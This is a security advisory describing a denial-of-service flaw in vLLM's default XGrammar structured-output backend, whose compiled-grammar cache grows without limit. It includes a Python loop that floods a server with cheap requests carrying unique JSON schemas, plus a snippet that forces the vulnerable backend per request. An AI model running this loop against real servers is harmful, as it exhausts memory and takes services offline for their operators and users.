Impact
This report highlights a vulnerability in XGrammar, a library used by the structured output feature in vLLM. The XGrammar advisory is here: GHSA-389x-67px-mjg3
The xgrammar library is the default backend used by vLLM to support structured output (a.k.a. guided decoding). xgrammar provides a required, built-in cache for its compiled grammars, stored in RAM. xgrammar is available by default through the OpenAI-compatible API server with both the V0 and V1 engines.
A malicious user can send a stream of very short decoding requests, each with a unique schema, causing a new entry to be added to the cache for every request. Because the cache is unbounded, this can result in a Denial of Service by consuming all of the system's RAM.
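The pattern is simple to sketch. The following is illustrative only, not a tested exploit: it assumes a vLLM OpenAI-compatible server at a placeholder URL serving a placeholder model, and uses vLLM's `guided_json` structured-output parameter. Each request carries a structurally unique JSON schema, so no request can be served from the cache and every request compiles and caches a new grammar:

```python
# Illustrative sketch of the attack pattern described above, not a tested
# exploit. The server URL and model name are placeholders.
import uuid

import requests

URL = "http://localhost:8000/v1/completions"

for _ in range(1_000_000):
    # A structurally unique JSON schema per request means the compiled
    # grammar can never be served from xgrammar's cache, so every request
    # adds a new cache entry and RAM use grows without bound.
    schema = {
        "type": "object",
        "properties": {uuid.uuid4().hex: {"type": "string"}},
    }
    requests.post(
        URL,
        json={
            "model": "my-model",
            "prompt": "hi",
            "max_tokens": 1,        # keep each request cheap for the attacker
            "guided_json": schema,  # vLLM's structured-output extension
        },
    )
```

Since each cache entry holds a compiled grammar, memory consumption grows linearly with the number of unique schemas submitted.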
Note that even if vLLM is configured to use a different backend by default, it is still possible to choose xgrammar on a per-request basis using the `guided_decoding_backend` key of the `extra_body` field of the request with the V0 engine. This per-request choice is not available when using the V1 engine.
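For illustration, a per-request override on the V0 engine might look like the following sketch, which assumes the official openai Python client (whose `extra_body` passthrough forwards extra keys to the server) and placeholder server and model values:

```python
# Hedged sketch of the per-request backend override on the V0 engine.
# Server URL, API key, and model name are placeholders.
from openai import OpenAI

client = OpenAI(base_url="http://localhost:8000/v1", api_key="EMPTY")

client.completions.create(
    model="my-model",
    prompt="hi",
    max_tokens=1,
    extra_body={
        "guided_json": {"type": "object"},
        # Force the xgrammar backend for this request even if the server
        # was started with a different default (V0 engine only).
        "guided_decoding_backend": "xgrammar",
    },
)
```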
Patches
Workarounds
There is no way to work around this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI-compatible API server.
References